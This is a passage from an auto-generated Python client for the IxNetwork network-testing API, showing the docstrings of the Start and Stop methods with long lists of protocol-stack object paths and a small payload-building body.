- Arg2 (str(async | sync)): kArray[kObjref=/vport/protocolStack/atm,/vport/protocolStack/atm/dhcpEndpoint,/vport/protocolStack/atm/dhcpEndpoint/ancp,/vport/protocolStack/atm/dhcpEndpoint/range,/vport/protocolStack/atm/dhcpEndpoint/range/ancpRange,/vport/protocolStack/atm/dhcpServerEndpoint,/vport/protocolStack/atm/dhcpServerEndpoint/range,/vport/protocolStack/atm/emulatedRouter,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/ancp,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint/range,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip,/vport/protocolStack/atm/emulatedRouter/ip/ancp,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/twampClient,/vport/protocolStack/atm/emulatedRouter/ip/twampServer,/vport/protocolStack/atm/emulatedRouter/ipEndpoint,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/ancp,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/atm/emulatedRouter/ipEndpoint/twampServer,/vport/protocolStack/atm/emulatedRouterEndpoint,/vport/protocolStack/atm/emulatedRouterEndpoint/range/amtRange,/vport/protocolStack/atm/ip,/vport/protocolStack/atm/ip/ancp,/vport/protocolStack/atm/ip/egtpPcrfEndpoint,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/l2tpEndpoint,/vport/protocolStack/atm/ip/l2tpEndpoint/range,/vport/protocolStack/atm/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/smDnsEndpoint,/vport/protocolStack/atm/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/atm/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/atm/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/atm/ip/twampClient,/vport/protocolStack/atm/ip/twampServer,/vport/protocolStack/atm/ipEndpoint,/vport/protocolStack/atm/ipEndpoint/ancp,/vport/protocolStack/atm/ipEndpoint/range/amtRange,/vport/protocolStack/atm/ipEndpoint/range/ancpRange,/vport/protocolStack/atm/ipEndpoint/range/twampControlRange,/vport/protocolStack/atm/ipEndpoint/twampClient,/vport/protocolStack/atm/ipEndpoint/twampServer,/vport/protocolStack/atm/pppox,/vport/protocolStack/atm/pppox/ancp,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/ancpRange,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppox/dhcpoPppClientEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range/ancpRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppox/dhcpoPppServerEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/atm/pppoxEndpoint,/vport/protocolStack/atm/pppoxEndpoint/ancp,/vport/protocolStack/atm/pppoxEndpoint/range,/vport/protocolStack/atm/pppoxEndpoint/range/ancpRange,/vport/protocolStack/atm/pppoxEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/atm/pppoxEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet,/vport/protocolStack/ethernet/dcbxEndpoint,/vport/protocolStack/ethernet/dcbxEndpoint/range,/vport/protocolStack/ethernet/dhcpEndpoint,/vport/protocolStack/ethernet/dhcpEndpoint/ancp,/vport/protocolStack/ethernet/dhcpEndpoint/range,/vport/protocolStack/ethernet/dhcpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/dhcpServerEndpoint,/vport/protocolStack/ethernet/dhcpServerEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/ancp,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/dhcpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/dhcpServerEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip,/vport/protocolStack/ethernet/emulatedRouter/ip/ancp,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/emulatedRouter/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ip/twampClient,/vport/protocolStack/ethernet/emulatedRouter/ip/twampServer,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/ancp,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/amtRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/ancpRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/twampClient,/vport/protocolStack/ethernet/emulatedRouter/ipEndpoint/twampServer,/vport/protocolStack/ethernet/emulatedRouterEndpoint,/vport/protocolStack/ethernet/emulatedRouterEndpoint/range/amtRange,/vport/protocolStack/ethernet/esmc,/vport/protocolStack/ethernet/fcoeClientEndpoint,/vport/protocolStack/ethernet/fcoeClientEndpoint/range,/vport/protocolStack/ethernet/fcoeClientEndpoint/range,/vport/protocolStack/ethernet/fcoeClientEndpoint/range/fcoeClientFdiscRange,/vport/protocolStack/ethernet/fcoeClientEndpoint/range/fcoeClientFlogiRange,/vport/protocolStack/ethernet/fcoeFwdEndpoint,/vport/protocolStack/ethernet/fcoeFwdEndpoint/range,/vport/protocolStack/ethernet/fcoeFwdEndpoint/secondaryRange,/vport/protocolStack/ethernet/ip,/vport/protocolStack/ethernet/ip/ancp,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpSgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/egtpUeS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLacEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tp/dhcpoLnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/ip/l2tpEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/amtRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ip/smDnsEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ip/twampClient,/vport/protocolStack/ethernet/ip/twampServer,/vport/protocolStack/ethernet/ipEndpoint,/vport/protocolStack/ethernet/ipEndpoint/ancp,/vport/protocolStack/ethernet/ipEndpoint/range/amtRange,/vport/protocolStack/ethernet/ipEndpoint/range/ancpRange,/vport/protocolStack/ethernet/ipEndpoint/range/twampControlRange,/vport/protocolStack/ethernet/ipEndpoint/twampClient,/vport/protocolStack/ethernet/ipEndpoint/twampServer,/vport/protocolStack/ethernet/pppox,/vport/protocolStack/ethernet/pppox/ancp,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/pppox/dhcpoPppClientEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/pppox/dhcpoPppServerEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/pppoxEndpoint,/vport/protocolStack/ethernet/pppoxEndpoint/ancp,/vport/protocolStack/ethernet/pppoxEndpoint/range,/vport/protocolStack/ethernet/pppoxEndpoint/range/ancpRange,/vport/protocolStack/ethernet/pppoxEndpoint/range/dhcpv6PdClientRange,/vport/protocolStack/ethernet/pppoxEndpoint/range/dhcpv6ServerRange,/vport/protocolStack/ethernet/vepaEndpoint,/vport/protocolStack/ethernet/vepaEndpoint/range,/vport/protocolStack/ethernetEndpoint,/vport/protocolStack/ethernetEndpoint/esmc,/vport/protocolStack/fcClientEndpoint,/vport/protocolStack/fcClientEndpoint/range,/vport/protocolStack/fcClientEndpoint/range,/vport/protocolStack/fcClientEndpoint/range/fcClientFdiscRange,/vport/protocolStack/fcClientEndpoint/range/fcClientFlogiRange,/vport/protocolStack/fcFportFwdEndpoint,/vport/protocolStack/fcFportFwdEndpoint/range,/vport/protocolStack/fcFportFwdEndpoint/secondaryRange]
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
payload = { "Arg1": self }
for i in range(len(args)): payload['Arg%s' % (i + 2)] = args[i]
for item in kwargs.items(): payload[item[0]] = item[1]
return self._execute('start', payload=payload, response_object=None)
def Stop(self, *args, **kwargs):
# type: (*Any, **Any) -> None
"""Executes the stop operation on the server.
Teardown sessions for all protocols on all ranges belonging to selected plugins
The IxNetwork model allows for multiple method Signatures with the same name while python does not.
stop(async_operation=bool)
--------------------------
- async_operation (bool=False): True to execute the operation asynchronously. Any subsequent rest api calls made through the Connection class will block until the operation is complete.
stop(Arg2=enum, async_operation=bool)
-------------------------------------
- Arg2 (str(async | sync)): kArray[kObjref=/vport/protocolStack/atm,/vport/protocolStack/atm/dhcpEndpoint,/vport/protocolStack/atm/dhcpEndpoint/ancp,/vport/protocolStack/atm/dhcpEndpoint/range,/vport/protocolStack/atm/dhcpEndpoint/range/ancpRange,/vport/protocolStack/atm/dhcpServerEndpoint,/vport/protocolStack/atm/dhcpServerEndpoint/range,/vport/protocolStack/atm/emulatedRouter,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/ancp,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/dhcpEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint/range,/vport/protocolStack/atm/emulatedRouter/dhcpServerEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip,/vport/protocolStack/atm/emulatedRouter/ip/ancp,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpPcrfS5S8SgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/amtRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/ancpRange,/vport/protocolStack/atm/emulatedRouter/ip/egtpS5S8PgwEndpoint/range/twampControlRange,/vport/protocolStack/atm/emulatedRouter/ip/